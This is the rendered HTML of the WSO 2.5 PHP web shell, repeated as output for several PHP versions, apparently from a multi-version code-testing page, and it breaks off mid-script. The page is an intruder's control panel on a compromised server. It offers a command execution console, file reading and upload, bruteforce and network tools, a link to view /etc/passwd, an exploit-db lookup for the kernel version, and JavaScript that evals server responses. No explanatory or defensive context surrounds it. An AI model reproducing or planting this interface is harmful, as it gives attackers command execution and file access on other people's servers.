<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.3 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.2
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.2 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.1
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.1 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.0
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.0 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.29
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else 